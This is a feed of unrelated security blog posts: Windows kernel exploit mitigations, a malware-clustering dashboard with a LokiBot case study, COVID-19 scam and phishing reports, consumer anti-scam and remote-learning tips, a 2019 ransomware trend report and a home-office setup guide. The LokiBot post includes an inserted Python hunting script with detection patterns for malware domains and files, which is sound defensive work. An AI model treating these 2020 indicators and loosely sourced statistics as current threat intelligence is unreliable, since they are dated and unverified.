For example, turning vulnerabilities like the ones discovered in SMBv3 into working exploits requires finding writeable kernel pages at reliable addresses, a task that requires heap grooming and corruption, or a separate vulnerability in Windows kernel address space layout randomization (ASLR). Typical heap-based exploits taking advantage of a vulnerability like the one described here would also need to make use of other allocations, but Windows 10 pool hardening helps mitigate this technique. These mitigations work together and have a cumulative effect when combined, increasing the development time and cost of reliable exploitation.

Assuming attackers gain knowledge of our address space, indirect jumps are mitigated by kernel-mode CFG. This forces attackers to either use data-only corruption or bypass Control Flow Guard via stack corruption or yet another bug. If virtualization-based security (VBS) and HVCI are enabled, attackers are further constrained in their ability to map and modify memory permissions.

On Secured-core PCs these mitigations are enabled by default. Secured-core PCs combine virtualization, operating system, and hardware and firmware protection. Along with Microsoft Defender Advanced Threat Protection, Secured-core PCs provide end-to-end protection against advanced threats.

While these mitigations collectively lower the chances of successful exploitation, we continue to deepen our investment in identifying and fixing vulnerabilities before they can get into the hands of adversaries.


The post Mitigating vulnerabilities in endpoint network stacks appeared first on Microsoft Security.

Cyber Threats Observatory Gets Improvements

Today I am happy to announce a big improvement to the threats observatory (available here). The main improvement is the introduction of clustering stereotypes for each tracked malware family across three different behaviors: Domains, Files and Processes.

Every malware sample acts in the domain, file and process realms: it contacts several domain names, spawns specific processes and eventually saves files to disk (file-less malware is a separate topic here). Collecting everything produced by their execution and clustering on string similarity highlights several stereotypes that are interesting for further study or for similarity-based blocking lists. The following image shows the current deployment state.

Screenshot of the Cyber Threats Observatory.

What you find

The Cyber Threats Observatory Dashboard is composed of the following sections:

  • Malware Families Trends. Detection distribution over time: in other words, the time frames in which specific families are most active relative to others.
  • Malware Families. Automatic Yara rules classify samples into families. Many samples were not classified into a family; this happens when no signatures match the sample or when multiple family signatures match the same sample. In both cases I am not sure which family the sample belongs to, so it is classified as “unknown” and not visualized on this graph. The missing slice of the pie is attributed to “unknown”.
  • Distribution Types. Based on the magic file bytes, this graph tracks the percentages of file types that malware used as carriers.
  • Threat Level Distribution. From 0 to 3, increasingly dangerous. It would be interesting to understand the threat level of unknown families as well, in order to see whether malware or false positives hide among the unknown families. For that reason a dedicated graph named Unknown Families Threat Level Distribution has been created.
  • Stereotypes. Studying stereotypes is useful for analyzing similarities within clusters; in other words, it shows the patterns used by malware in domain names, file names and process names. This matters for detection and even for preemptive blocking. Due to the vast amount of data, only the most recent 10000 entries are included.
  • TOP domains, TOP processes and TOP File Names. With a sliding window of the last 300 analyzed samples, the backend extracts the TOP (in terms of frequency) contacted domains, spawned processes and utilized file names. There is no filter and no post-processing in these fields, which means you could find “google.com” or “microsoft update” as a TOP domain; that is fine, since if the sample queried them before performing its malicious intent, it is simply recorded and brought to your attention. The same applies to processes and file names. Indeed these fields include the term “involved” in their title: if something is involved, it does not mean that it is malicious, only that it was part of a malicious chain.

A simple example

Let’s assume we want to investigate LokiBot. According to any.run: Lokibot, also known as Loki-bot or Loki bot, is an information stealer malware that collects data from most widely used web browsers, FTP, email clients and over a hundred software tools installed on the infected machine.

But let’s start digging a little into the Cyber Threats Dashboard and see what we can find. First of all, from the Malware Families section we see the overall detection rate. Today, we might easily say that LokiBot has a low detection percentage, 0.32388, compared to different families such as GrandCrab, Emotet or TrickBot.

Malware Families

From the Family Distribution Over Time section (the following image) we can appreciate the detection distribution rate. By deselecting the unwanted malware families it is possible to track the distribution of the desired one (in our case LokiBot) over time. In the following case all families but LokiBot have been disabled (by clicking on the malware name directly in the graph legend). We can see a compelling increase in LokiBot detections on 2020-04-28 and from 2020-04-30 to 2020-05-02. It looks like the most active observed period for this well-documented family during 2020. This observation fits the public mainstream information, with many security magazines and vendors observing the same increase, mostly spread through COVID-19 malspam: SecurityAffairs, BankInfoSecurity, ThreatPOST, FortiNet.

Families Distribution Over Time

Digging a little bit into the specific case, we might observe the domain stereotypes. It’s nice to see that many domain stereotypes (in other words, the representatives of a wide set of similar domains) have .cf (Central African Republic) as the Top Level Domain, and some of them are quite similar: broken1.cf, broken2.cf, and so on and so forth. Nothing very original, and easy to block with a pattern such as: broken<number>.cf

LokiBot Domain Stereotypes as of 2020-05-02

Following on in the diagram we might observe one more domain stereotype having .ICU as TLD, in particular frenchman.icu (a generic TLD targeting entrepreneurs and business owners), and following on this path one more domain stereotype having .co.ke (referring to Kenya). Now let’s try to focus a little bit on “Files” and check if there are some patterns in the “File” section. So let’s check the following diagram.

LokiBot File Stereotypes as of 2020-05-02

The linearity of the composition (every stereotype gets the same score, in that case 3) suggests that the malware uses the different groups of files equally, meaning that if it starts on a victim machine it reads/creates/writes every single file at least one time per run. We might appreciate a nice pattern in the temporary file names, but it won’t help us in detection, since it is the default Windows temporary file pattern. However, we might associate the presence of such temporary files with the direct usage of spoolsv.exe, mrsys.exe and even explorer.exe. Even if many false positives could be triggered, it would be nice to give it a try and see where it leads!

More interesting would be the presence of a specific file, ([a..z][0.9]).lck, whose presence would be a nice key point to check (by using file detection).
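To show how the stereotypes above translate into hunting rules, here is an added example (not code from the original post or from the Cyber Threat Observatory): it tags DNS queries matching the broken<number>.cf pattern, the frenchman.icu stereotype and the .cf/.icu/.co.ke TLDs, and flags the .lck file plus temporary files touched by spoolsv.exe, mrsys.exe or explorer.exe. The log lines are constructed, the log format is assumed, and the regular expressions are this example’s reading of the page’s notation (the .lck pattern is read as a single lowercase letter or digit; the temporary-file pattern assumes Windows’ default tmpXXXX.tmp naming).

```python
"""Hunting rules derived from the LokiBot stereotypes discussed above.

Added example, not part of the original post. All log lines are constructed
and the regular expressions are this example's reading of the stereotypes.
"""
import re
from typing import List, Optional, Tuple

# --- Domain stereotypes -------------------------------------------------
BROKEN_CF = re.compile(r"^broken\d+\.cf$")          # broken<number>.cf
STEREOTYPE_DOMAINS = {"frenchman.icu"}              # exact matches from the page
WATCH_TLDS = ("cf", "icu", "co.ke")                 # low-confidence tagging only

# --- File stereotypes ---------------------------------------------------
# "([a..z][0.9]).lck" read as a single lowercase letter or digit plus ".lck"
# (assumption: the page's notation is ambiguous).
LCK_FILE = re.compile(r"(?:^|[\\/])[a-z0-9]\.lck$")
# Default Windows temp-file naming (tmpXXXX.tmp, assumed); noisy on its own,
# so it is only flagged when paired with one of the processes named on the page.
TMP_FILE = re.compile(r"[\\/]temp[\\/]tmp[0-9a-f]{1,4}\.tmp$", re.IGNORECASE)
WATCH_PROCESSES = {"spoolsv.exe", "mrsys.exe", "explorer.exe"}


def _has_tld(domain: str, tld: str) -> bool:
    # Strict label match: "notes.scf" must NOT count as a ".cf" domain.
    return domain == tld or domain.endswith("." + tld)


def classify_domain(domain: str) -> Optional[str]:
    """Return a tag for a queried domain, or None when nothing matches."""
    d = domain.lower().rstrip(".")
    if BROKEN_CF.match(d):
        return "lokibot-broken-cf"
    if d in STEREOTYPE_DOMAINS:
        return "lokibot-stereotype-domain"
    if any(_has_tld(d, t) for t in WATCH_TLDS):
        return "watch-tld"
    return None


def classify_file_event(process: str, path: str) -> Optional[str]:
    """Return a tag for a (process, file path) pair, or None."""
    if LCK_FILE.search(path.lower()):
        return "lokibot-lck-file"
    if process.lower() in WATCH_PROCESSES and TMP_FILE.search(path):
        return "tempfile-by-watched-process"
    return None


def hunt(dns_log: str, file_log: str) -> List[Tuple[str, str, str, str]]:
    """Run both rule sets over whitespace-separated log lines (assumed format).

    DNS lines:  <timestamp> <client> <domain>
    File lines: <timestamp> <process> <operation> <path>
    """
    hits = []
    for line in dns_log.strip().splitlines():
        ts, _client, domain = line.split()
        tag = classify_domain(domain)
        if tag:
            hits.append((ts, "dns", tag, domain))
    for line in file_log.strip().splitlines():
        ts, proc, _op, path = line.split(maxsplit=3)
        tag = classify_file_event(proc, path)
        if tag:
            hits.append((ts, "file", tag, path))
    return hits


# Constructed sample data (not real telemetry).
DNS_LOG = """
2020-05-02T10:00:01Z 10.0.0.7 google.com
2020-05-02T10:00:04Z 10.0.0.7 broken3.cf
2020-05-02T10:00:09Z 10.0.0.9 frenchman.icu
2020-05-02T10:00:12Z 10.0.0.9 example.co.ke
2020-05-02T10:00:15Z 10.0.0.9 notes.scf
"""
FILE_LOG = r"""
2020-05-02T10:01:02Z spoolsv.exe CreateFile C:\Users\victim\AppData\Local\Temp\tmpA1B2.tmp
2020-05-02T10:01:03Z notepad.exe CreateFile C:\Users\victim\AppData\Local\Temp\tmpC3D4.tmp
2020-05-02T10:01:05Z mrsys.exe CreateFile C:\Users\victim\AppData\Roaming\7f1e\a.lck
2020-05-02T10:01:06Z explorer.exe ReadFile C:\Users\victim\Documents\report.docx
"""

if __name__ == "__main__":
    for hit in hunt(DNS_LOG, FILE_LOG):
        print(*hit)
```

The temporary-file rule deliberately requires the process pairing the post describes, otherwise every tmpXXXX.tmp on the host would fire; the TLD rule is kept at a separate, low-confidence tag because plenty of legitimate traffic uses those TLDs.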

Conclusion

In this post I’ve introduced a big improvement of the Cyber Threat Observatory, showing a quick and dirty analysis of LokiBot through stereotypes. The aim of this project is not to give detailed analyses of malware, but rather to focus on general patterns and macro stereotypes in order to perform massive data analysis.

Hope you might find it useful, if so please share it with your fellows.

Cybercriminals Are Exploiting the Covid-19 Pandemic

Cybercriminals are actively targeting Covid-19 hotspots with malware and phishing campaigns, according to a new report from Bitdefender.

The report, “Coronavirus-themed Threat Reports Haven’t Flattened the Curve,” shows a direct correlation between confirmed Covid-19 cases and malware attacks exploiting the crisis.

These findings confirm a similar report that showed a 30000% increase in Covid-19-themed attacks from January to March.

“Countries that have reported the largest number of Coronavirus-themed [scams] seem to have also been those hit hardest by the pandemic,” the report stated, showing a concurrent increase in both confirmed cases and malware attacks in South Africa in April as an example.

Data from the Bitdefender report also indicated a connection between an increase in phishing campaigns in areas where testing for Covid-19 has become available.

“[W]e can safely infer that people who get tested are interested in learning more about potential treatments, medicine, medical best practices, and maybe even other patient’s experiences… those spending more time online looking for information about COVID-19 are more likely to fall prey to scams and malware related to Coronavirus,” the report stated. “Receiving an email claiming to have new and interesting information about the pandemic with more exclusive information embedded within the attachment is the perfect lure.”

Read the full report here.

The post Cybercriminals Are Exploiting the Covid-19 Pandemic appeared first on Adam Levin.

How to Spot an Online Scam?

With the advent of ‘smart’ devices, which includes everything from self-driving cars, smart assistants such as Amazon’s Alexa to smart refrigerators, the modern-day internet continues to expand into the vast IoT, giving rise to a highly interconnected digital landscape.

On the surface, the interconnectivity offered by the IoT seems to be highly advantageous, and although that might be true to a certain extent, it also offers several entry points for cybercriminals to profit off of naive internet users.

Moreover, despite the 391,000,000 Google search results that come up when you type the words ‘online scams,’ for many individuals, there are still many doubts and uncertainties as far as online fraud is concerned, particularly in light of how easy it’s become to falsify reviews in Google and elsewhere.

For starters, the most basic mistake that the naive internet user is likely to make is to group together all sorts of online scams, and cybercrimes together, which results in the poor prioritization of threats. Along with the misunderstanding that all scams are created equal, the typical internet user is also unequipped with the means to identify subtler scams.

In an attempt to aid our readers in identifying an online scam while it is still in its initial stages, we’ve compiled an article that covers everything that you need to know about online scamming, along with tips to prevent them from happening, and steps that you can take in the instance you find yourself a victim of an online scam.

What Exactly is an “Online Scam”?

Up till this point, we’ve only skimmed over the details of what an online scam is. To put it quite simply, and as the name itself suggests, an online scam is a type of digital fraud. With rapid-paced advancements being made in email marketing, internet protocol technology, and web hosting performance, online scams have taken on an arsenal of forms, all of which are growing increasingly sophisticated.

How sophisticated, exactly? In a recent interview with Gary Stevens, founder of the Ottawa-based web hosting reviews website HostingCanada.org, Stevens said this: “Since 2016, we’ve seen a 381% increase in the sophistication of online scams routed through most Canadian web hosts. Not only are they increasing in frequency, but also in sophistication.”

Having said that, the pivotal focus of an online scam is to leverage an individual’s personal information for financial gains. Typically, the stolen confidential data is utilized by cybercriminals to trick people into giving them money.

Most online scams fall into one of the following categories:

The Email Money Scam

Perhaps the least sophisticated online scam out there, email money fraud schemes rely heavily on the naivete of their victims to fall into the hackers’ poorly constructed web of deceit.

One of the most common examples of the email money scam is the ‘Nigerian bank scam,’ which sends potential victims emails or messages that usually lead to some sort of advance-fee fraud. Fortunately, however, despite how persistent the Nigerian 419 scam is, one need only look out for the many red flags to avoid it.

The ‘Compromised’ Friend

One of the defining characteristics of online scams is that they usually propagate through every aspect of an individual’s life, including friendships, which, as it turns out, offer an excellent medium to spread the scam further.

We’ve all been in situations where we’ve received an urgent message on Facebook Messenger from a distant relative, or acquaintance expressing a grave situation that they’ve landed themselves in, and how they need financial help from you. Unlike the email money scam, people are more likely to fall for a message from a compromised friend, since they think that they’re helping an acquaintance in need.

The Tailor-Made Problem

As technology steers itself forward at lightning pace, cybercriminals all over the place have taken to creating increasingly sophisticated and complex scamming schemes. One such example is when online scammers scour through your social media profiles, along with the sensitive information they’ve stolen, to create a specific problem in an attempt to coerce an immediate payment. Typically, the problem may involve a family emergency or an alleged debt that needs to be paid off immediately.

Why Do Individuals Fall for Online Scams?

From what we’ve described so far, some of our more cynical readers might be wondering why people fall for online scams in the first place. Some of them, such as the Nigerian 419 scams, have several tell-tale signs that make avoiding the scam a piece of cake.

Despite the multiple red flags that an online scam might display, individuals fall prey to online fraud schemes, simply because these scams are designed in a way that enables cybercriminals to prey on the natural human inclination to seek gain.

Simply put, an online scam works because it targets individuals’ emotions, rather than their logic. For an online scammer, the task is quite simple: all they have to do is come up with an offer that is too good to be true, or a situation that leverages someone’s weakness, and make money off of it.

In addition to preying on our innate human tendency to seek gain and avoid loss, these online scams also target the instinctive choices that we make. Some of the most common examples of this are the fear of missing out, where we’re promised a huge reward but only if we act instantaneously. Similarly, there’s loss aversion, which has an individual act quickly to avoid facing bigger losses later.

How Do Online Scammers Discover Their Victims?

As is the case with most scams, whether they be online or not, scammers rely on an arsenal of ways to wreak damage on their victims. Some of the most popular ways through which online scammers lure their victims include the following:

● Email Phishing:

The most common way through which online scammers launch their deceiving schemes is email phishing. Phishing refers to cybercriminals sending emails containing a malicious link to a fraudulent website, typically disguised as a banking or e-commerce site, which tricks the victims into giving away their financial details.

● Mobile Phishing:

Similar to email phishing, mobile phishing focuses on getting potential victims to download malware on their mobile devices. The malware then works in the background to snoop around and collect the victim’s sensitive information, including financial details.

● Fake Software:

Another popular way for cybercriminals to launch their online scams is through fake software, also referred to as scareware. While browsing, potential victims receive a pop-up window indicating that their device has been infected with a virus. Once users click on a link to remove the infection, the scareware installs malware on their device, which allows the scammer to harvest confidential information for monetary gain.

● Social Media:

Sometimes, popular social media platforms can also house online scams, encouraging users to click on a malicious link. Furthermore, since people are very forthcoming with their personal information on social media platforms, they can also be highly susceptible to identity theft and socially engineered scams.

Can Online Scams Be Avoided?

Despite seeing a spike in both popularity and complexity, individuals can still avoid online scams, by taking a couple of simple steps, which consist of the following:

  • Try to stay away from posting personal information on your social media accounts. Although the temptation to post about our achievements might be too strong, we’d recommend that you don’t provide cybercriminals with a data source to launch socially engineered attacks, and scams on you in the future.
  • Avoid clicking on any unexpected links, which includes pop-up windows, and any ‘shady’ links present within the body of an email that you’ve received.
  • If you’re stuck in a situation where the other party is pressuring you for immediate payment, we’d highly suggest that you ask them for documentation that can confirm their legitimacy.
  • The last one on our list shouldn’t even be here, but unfortunately, there have been several cases of people giving their passwords to strangers online. The basic rule that you need to engrave on your heart is to never, under any circumstance, give your password to other people!

What Steps Can You Take Once You’ve Fallen Prey to An Online Scam?

In the unfortunate instance that you’ve fallen victim to an online fraud scheme, the first and foremost step that you need to take is to report the scam.

We’d suggest that you report it to a legitimate organization such as the FTC or the Internet Crime Complaint Center (IC3). They may be able to point you toward reputable data recovery services, but it’s hard to say whether or not they will be able to fix all the damage that’s been done.

Moreover, if you notice any suspicious credit/debit card transactions, contact your bank and ask them to reverse any fraudulent charges.

In cases where you suspect that your devices have been infected with malware, run antivirus and antimalware software, and change all your passwords to protect any further sensitive information from being compromised.

Last but certainly not least, notify all your friends and family about the scam, so as to prevent the scam from propagating any further than it already has.


Conclusion

At the end of the article, we can only hope that we’ve gotten the basics of spotting an online scam down for our readers. As scammers employ a variety of complex techniques to deceive innocent people, we’d like our readers to realize the significance of taking their privacy seriously, and taking the aforementioned steps to stay safe online!

The post How to Spot an Online Scam? appeared first on .

Way Out of The MAZE: A Quick Guide For Defending Against Maze Ransomware

From late 2019, MAZE Ransomware started becoming infamous for its encryption, data stealing and the subsequent selling of the stolen data. Other reasons behind its notoriety are its unusual targets and its ransom demands. Since its inception around May 2019, MAZE actors have been targeting multiple sectors, prominent ones…

How to Stay Secure While Distance Learning: Don’t Get Schooled by Hackers

Many students hold their college experience near and dear to their hearts. Apart from working towards a degree and a desired career path, students rely on college to make lifelong friends and gain a heightened sense of responsibility and independence. But due to recent circumstances, many college students had this experience interrupted or put on pause. With many schools closed for the remainder of the year, college students have moved from in-person course work to virtual classrooms, or distance learning. Distance learning has consequentially led to a rapid uptick in online learning among college students. But as more students continue their curriculum from home and online activity increases, the need for enhanced security increases as well.

Video Lectures

The transition to distance learning has led to many teachers and schools turning to online video conferencing tools to conduct virtual lectures. However, many of these tools have proven to lack the necessary security measures. As we’ve previously discussed, many users have been found sharing their meeting links on social media platforms like Twitter. This could allow an attacker to simply click on one of these links and interrupt an online lecture or club meeting with inappropriate content. As a result, students could lose valuable time meant to be spent toward their education. And while some schools have banned some online conferencing tools from being used for distance learning, it’s important for students to stay educated on the various security risks involved with video lectures, whether their school has provided guidelines or not.  

Connected Devices & Home Networks

Many schools and universities have asked for students to move out of their on-campus housing for the remainder of the school year. Moving off campus means that the devices and school networks provided by a campus may no longer be available to students. While many students already leverage their personal device for schoolwork, this situation makes those devices the only option.  

Additionally, much like those who have made the transition to working from home, using personal devices on home networks could pose a variety of threats. Students are moving from their universities’ professionally managed networks to home Wi-Fi setups protected with basic passwords, which are usually more easily infiltrated by hackers. Once a hacker gains access to a student’s home network, they have the opportunity to exploit other devices connected to the Wi-Fi.  

How to Secure Your Virtual Classroom

So, what can students do to help ensure that their path towards a degree isn’t interrupted by the adoption of distance learning? Taking online security seriously is the perfect place to start. Here are some tips to help ensure that learning from home goes as smoothly as possible.  

Choose an Encrypted Online Conferencing Tool

Does the video conferencing tool you’re considering use end-to-end encryption? This ensures that only meeting participants have the ability to decrypt secure meeting content. Additionally, be sure to read the privacy policies listed by the video conferencing programs to find the one that is the most secure and fits your needs.   

Use a VPN

Avoid hackers infiltrating your network by using a VPN, which allows you to send and receive data while encrypting, or scrambling, your information so others can’t read it. By helping to protect your network, VPNs also prevent hackers from gaining access to other devices connected to your Wi-Fi.

Take Password Protection Seriously

Take the time to secure your devices and home network with unique, complex passwords. Many users, including students, utilize the same password, or variations of it, across all their accounts. This means if a hacker discovers just one password, all personal data is suddenly at risk. Therefore, it is crucial to diversify your passcodes to ensure hackers cannot obtain access to all your accounts at once, should one password be compromised. You can also employ a password manager to keep track of your credentials.  

Enable Two-Factor or Multi-Factor Authentication

Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification. This reduces the risk of successful impersonation by hackers. 

Stay Educated on Security Precautions

As you adapt to learning from home, you’ll likely consider downloading various online tools to help make the transition easier. Before downloading the first tools you see, do your research and check for possible security vulnerabilities or known threats.

Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 


The post How to Stay Secure While Distance Learning: Don’t Get Schooled by Hackers appeared first on McAfee Blogs.

Cybersecurity Trends

Trends are interesting since they could tell you where things are going.

I do believe in studying history and behaviors in order to figure out where things are going, so every year my colleagues from Yoroi and I spend several weeks studying and writing up what we observed during the past months in the Yoroi Cybersecurity Annual Report (freely downloadable from here: Yoroi Cybersecurity Report 2019).

The Rise of Targeted Ransomware

2019 was a breakthrough year in the cyber security of the European productive sector. The peculiarity of this year is not strictly related to the number of hacking attempts or to the malware code spread all over the Internet to compromise companies’ assets and data, but to the evolution and consolidation of a new, highly dangerous kind of cyber attack. In 2019, we noticed a deep change in a consistent part of the global threat landscape, typically populated by state-sponsored actors, cyber-criminals and hacktivists, each with its own attributes in motivations, objectives, methods and sophistication.

During 2019 we observed a rapid evolution of cyber crime ecosystems hosting a wide range of financially motivated actors. We observed an increased volume of money-driven attacks compared to previous years. These actors are also involved in cyber-espionage, CEO frauds, credential stealing operations, PII (Personally Identifiable Information) and IP (Intellectual Property) theft, but are traditionally much more active in so-called “opportunistic” cyber attacks: attacks opportunistically directed at the whole internet population, such as botnets and crypto-miner infection waves, but also regional operations, for instance designed to target European countries like Italy or Germany as branches of major global-scale operations, as we tracked since 2018 with the sLoad case and even earlier with the Ursnif malware propagation waves.
In 2019, as in 2018, ransomware attacks played a significant role in the cyber arena. In previous years the whole InfoSec community observed the fast increase of the ransomware phenomenon, both in terms of newborn ransomware families and of ransom payment options, driven by the consolidation of the digital cryptocurrency market that made the traditional tracking techniques – operated by law enforcement agencies – less effective due to new untraceable crypto currencies. But these increasing volumes weren’t the most worrying aspect we noticed.

Before 2019, most ransomware attacks were conducted in an automated, mostly opportunistic fashion: for instance through drive-by download attacks and exploit kits, but also very frequently using the email vector. In fact, the “canonical” ransomware attacks before 2019 were characterized by an incoming email luring the victim to open an attachment, most of the time an Office document, carefully obfuscated to avoid detection and weaponized to launch ransomware able to autonomously encrypt local user files and shared documents.

During 2019, we monitored a deep change in this trend. Ransomware attacks became more and more sophisticated. Gradually, even major cyber-criminal botnet operators moved into this emerging sector, leveraging their infection capabilities, their long-term hacking experience and their bots to monetize their actions using new malicious business models. Indeed, almost every major malware family populating the cyber criminal landscape was involved in the delivery of follow-up ransomware into infected hosts. A typical example is the Gandcrab ransomware installation operated by Ursnif implants during most of 2019. But some criminal groups have gone further. They set the threat level to a new baseline.

Many major cyber criminal groups developed a sort of malicious “RedTeam” unit; let’s call them “DarkTeams”. These units are able to manually engage high value targets such as private companies or any kind of structured organization, gaining access to their core and owning the whole infrastructure at once, typically installing ransomware tools all across the network just after ensuring the deletion of the backup copies. Many times they also use industry-specific knowledge to tamper with management networks and hypervisors to reach an impressive level of potential damage.
Actually, this kind of behaviour is not new to us. Such methods of operations have been used for a long time, but not by such a large number of actors and not with such kind of objectives. Network penetration was in fact a peculiarity of state sponsored groups and specialized cyber criminal gangs, often threatening the banking and retail sectors, typically referenced as Advanced Persistent Threats and traditionally targeting very large enterprises and organizations.
During 2019, we observed a strong game change in the ransomware attacks panorama.

The special “DarkTeams” replicated advanced intrusion techniques from APT playbooks carrying them into private business sectors which were not traditionally prepared to deal with such kinds of threats. Then, they started to hit organizations with high impact business attacks modeled to be very effective for the victim context. We are facing the evolution of ransomware by introducing Targeted Ransomware Attacks.

We observed and tracked many gangs consolidating the new Targeted Ransomware Attacks model. Many of them have also been cited by mainstream media and press due to the heavy impact on the business operation of prestigious companies, such as the LockerGoga and Ryuk ransomware attacks, but they only were the tip of the iceberg. Many other criminal groups have consolidated this kind of operations such as DoppelPaymer, Nemty, REvil/Sodinokibi and Maze, definitely some of the top targeted ransomware players populating the threat landscape in the last half of 2019.
In the past few months we also observed the emergence of a really worrisome practice by some of these players: the public shaming of their victims. Maze was one of the first actors pioneering this practice in 2019: the group started to disclose the names of the private companies they hacked into, along with pieces of internal data stolen during the network intrusions.

The problem arises when the stolen data includes Intellectual Property and Personally Identifiable Information. In such a case the attacker leaves the victim organization with an additional, unfavourable position during the cyber-crisis: handling the data breach and the fines imposed by the Data Protection Authorities. During 2020 we expect these kinds of practices to become more and more common in the criminal ecosystems. Thus, adopting a proactive approach to the Cyber Security Strategy, leveraging services like Yoroi’s Cyber Security Defence Center, could be crucial to equip the company with the proper technology to acquire visibility on targeted ransomware attacks, and with the knowledge, skills and processes to spot and handle this new class of threats.

Zero-Day Malware

Well-known threats are always easier to recognize and manage, since their components and intents are very often clear. For example, ransomware as known today performs some standard operations such as (but not limited to): reading a file, encrypting it and writing it back. An early discovery of known threat families helps analysts to perform quick and precise analyses, while unknown threats are always difficult to manage, since analysts first need to discover the intentions and then map the behaviour back to standard operations. This is why we track Zero-Day Malware. Yoroi’s technology captures and collects samples before processing them on Yoroi’s shared threat intelligence platform, trying to attribute them to known threats.

As part of the automatic analysis pipeline, Yoroi’s technology reports whether the malicious files are potentially detected by Anti-Virus technologies at detection time. This specific analysis is mainly done to figure out if the incoming threat would be able to bypass perimeter and endpoint defences. As a positive side effect, we collect data on detected threats related to their notoriety. In other words, we are able to see if a malware belonging to a threat actor or related to a specific operation (or incident) is detected by AV, Firewall, Next Generation X and the endpoints in use.

In this context, we shall define what we mean by Zero-Day Malware. We call Zero-Day malware every sample that turns out to be an unknown variant of an arbitrary malware family. The following image (Fig:1) shows how most of the analyzed malware is unknown to the InfoSec community and to common Antivirus vendors. This finding supports the picture of an ever-evolving malware panorama in which attackers start from a shared code base but modify it depending on their need to be stealthy.


The reported data are collected during the first propagation of the malicious files across organizations. This means companies are highly exposed to the risk of Zero-Day malware. Detection and response time plays a central role in such cases, where the attack stays stealthy for hours or even days.
Along with the Zero-Day malware observation, most of the known malware at time of delivery does not have high chances of being blocked by security controls. 8% of the malware is detected by few AV engines and only 33% is actually well identified at time of attack. Even the so-called “known malware” is still a relevant issue due to its capability to maintain a low detection rate during the first infection steps. Indeed, less than 20% of analyzed samples belonging to the “not Zero-Day” set are detected by more than 15 AV engines.

Drilling down and observing the behavioural classification of the intercepted samples known by fewer than 5 AntiVirus engines at detection time, we might appreciate that the “Dropper” behaviour (i.e. the downloading or unpacking of other malicious stages or components) leads the way with 54% of cases, slightly decreasing since 2018. One more interesting trend in the analyzed data is the surprising decrease of Ransomware behaviour, dropping from 17% in 2018 to the current 2%, and the bullish rise of “Trojan” behaviours, up to 35% of cases, more than double the 15% of 2018.
This trend endorses the evidence that ransomware attacks in 2019 began to follow a targeted approach, as described in the “The Rise of Targeted Ransomware” section.


A reasonable interpretation of the changes in these data could actually fit with the sophistication of the malware infection chain discussed in the previous section. As a matter of fact, much of the delivered malware is actually a single part of a more complex infection chain: a chain able to install even multiple families of malware threats, starting from simple pieces of code behaving like droppers and trojan horses to grant access to a wider range of threats.

This trend gets another validation even in the Zero-Day malware data set: the samples likely unknown to the InfoSec community – at the time of delivery – substantially shifted their distribution from previous years. In particular, Ransomware behaviour detections dropped from 29% to 7% in 2019, and Trojan rose from 28% to 52% of cases, showing similar macro variations.


If you want to read more details on “DarkTeams” and on what we observed during the past months, please feel free to download the full report HERE.

Working From Home: Building Your Own Setup

This is the fifth week my company (Yoroi) and I are working from home (covid-19). While every company process is running smooth and fast, personal quarantine is getting quite long and heavy, especially if you are accustomed to traveling a lot for work. Under these circumstances the home office setup becomes very important, as you should be comfortable in delivering as much as you did while sitting in your perfectly fitting office. Moreover, during the past few weeks I received many emails and private messages from people like me asking for personal suggestions on home setup. So I decided to write up a little blog post on my personal suggestions about home setup for remote workers.

First: What you do.

My personal home desk changed a lot over the years. On one hand new technology became available, but on the other hand (and most importantly) my role and interests changed a lot over time. I started with a super-nerd home setup while I was in college, including soldering irons, a desoldering hot-air station, Arduino boards all over the shelves, Raspberry Pis in many case flavors, three monitors (one of them vertically oriented, for reading documentation), a black screen and mechanical keyboards. This environment fitted my needs at that specific time, but it would not fit my current needs. The first thing that you should do in refactoring your own home desk is to understand what you do. Not what you would like to do, but rather what you do. Before you start surfing gadget websites, just focus on what you are doing on a daily basis. A developer and a malware analyst share a few needs, but their environments won’t be close to each other. If you are a CXX your environment will definitely look different from your IT manager’s!

Second: Less is more.

I know many of you won't agree with this paragraph, but in my personal point of view “less is more” (cit. Mies). The more objects populate your desk, the higher the probability of getting distracted by them. I tended to have books on my desk, and every time I looked at them my mind went to that story or to what the book gave me in terms of knowledge and... this was really distracting me. Six things are my minimal and best setup: a laptop, a mouse, a mechanical keyboard, headphones, a big monitor and my phone.

Home Setup

Monitor

Talking about monitors, I would suggest a single big one. I used to have multiple monitors on my desk, and it is amazing to see how many parallel tasks you can keep on them, but many parallel tasks do not necessarily mean higher productivity. In my experience I noticed that it's best to focus on 3 or 4 parallel tasks, not more. So a big screen driven by a great window manager (see the software section) would help you not to overdo it with multiple tasks. However, if you are a developer an additional vertical screen would definitely help you in consulting StackOverflow, GitHub and documentation. In many other cases, I personally won't suggest more than two displays. My favorite size is 27″ and I prefer a “borderless” monitor with an adjustable “neck” in order to move it depending on chair position. Actually one of my favorites is the SAMSUNG SR75 4K UHD Space Monitor: it is Ultra HD, great looking and very minimal in space, so you would have much more room for your arms.

Keyboard

A mechanical keyboard is a little pleasure of life. If you are a writer it is definitely a “must have”, while if you are a developer or a malware analyst it's mostly fashion. Conversely, if you are a penetration tester or an adversarial simulator you would probably appreciate foldable keyboards more, or if you are an IT guy you would probably love small and tiny keyboards, light and easy to carry between racks in “work in progress” data centers. Like the monitor ecosystem, keyboards are a humongous world where there is never a “best in class”; there is only what “you like most”. In my case I do love Varmilo keyboards since they allow many quite interesting customizations. Ergonomics plays a fundamental role in keyboard choice, but even the most ergonomic keyboards could harm you if you do not have good body posture, so before getting into a very fancy ergonomic keyboard (like the most famous one HERE) try to correct your body posture.

Mouse

The mouse is one of the most used objects you will be touching once you sit on your comfortable chair, so you need to pay the right attention to what you choose. While the Kensington trackball mouse (here) is definitely my personal suggestion, I do not use it. Since I used to travel a lot during my normal working weeks, I can't carry it back and forth on trips: a trackball is not comfortable to move around at all. So I decided to take a small but nice mouse. If you are used to traveling a lot like me, you would probably appreciate a Bluetooth mouse with no cables in the bag (remember, less is more). The mouse should be small in size and light. I would suggest having a hard (metal) mechanical wheel with strong inertia in order to give you a nice scrolling feeling. One of my favorites is definitely the Logitech MX Anywhere 2.

Computer

